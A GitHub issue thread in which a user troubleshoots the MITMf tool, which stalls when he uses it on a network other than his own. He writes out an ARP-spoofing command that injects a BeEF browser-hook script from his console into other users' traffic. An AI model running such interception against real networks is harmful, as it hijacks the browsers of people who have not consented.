### ISSUE TITLE
MITMF - Wont work on a different network?

### ISSUE THREAD

**Issue by Benspring100** [byt3bl33d3r/MITMf#202]
At home MITMF works great, however when i use it on another network it gets stuck on [SMBserver] config file parsed. I am doing something like this mitmf --spoof --arp -i wlan0 --gateway (IP FROM when I do "route -n") --inject --js-url URL. But as I said "[SMBserver] config file parsed" it just gets stuck on this?

**Comment by byt3bl33d3r** [comment]
Please see https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug on how to report a bug, judging from the description you provided I'm also going to need a packet capture.. will re-open when you supply the required info

**Comment by Benspring100** [comment]
How would I add a packet capture? Also I don't think it's a bug as it works fine on my network.

**Comment by byt3bl33d3r** [comment]
@Benspring100 upload it somewhere and just post the link. Just FYI if you're not even able to reproduce the issue don't know how much help  i can be

**Comment by Benspring100** [comment]
Okay, I will take a screen shot of everything when it gets stuck. :) The network might be blocking it or something. Not sure.

**Comment by Benspring100** [comment]
![12041319_1242101692482860_1857135295_o](https://cloud.githubusercontent.com/assets/7441281/10114501/5b76fe6e-63e9-11e5-81dd-5970c75288e1.jpg)
![12059903_1242101715816191_825225159_o](https://cloud.githubusercontent.com/assets/7441281/10114500/5b755af0-63e9-11e5-8e19-966eed2860c4.jpg)

**Comment by Benspring100** [comment]
I have posted the images, for some reason I am getting lots of Could not proxy request when I am using my BEEF-project. Also, it was just displaying "Config file parsed" when I went to a different network.

I typed this originally in: mitmf --spoof --arp -i wlan0 --gateway (IP FROM DOING route -n) --inject --js-url http://URL FROM BEEF CONSOLE

**Comment by Benspring100** [comment]
Its weird, when I run this on my home network I now get lots of ERROR sending re-position packet (4, 'Interrupted system call'

What does that mean? When using MITMF to inject my beef-project its not wokring anymore.
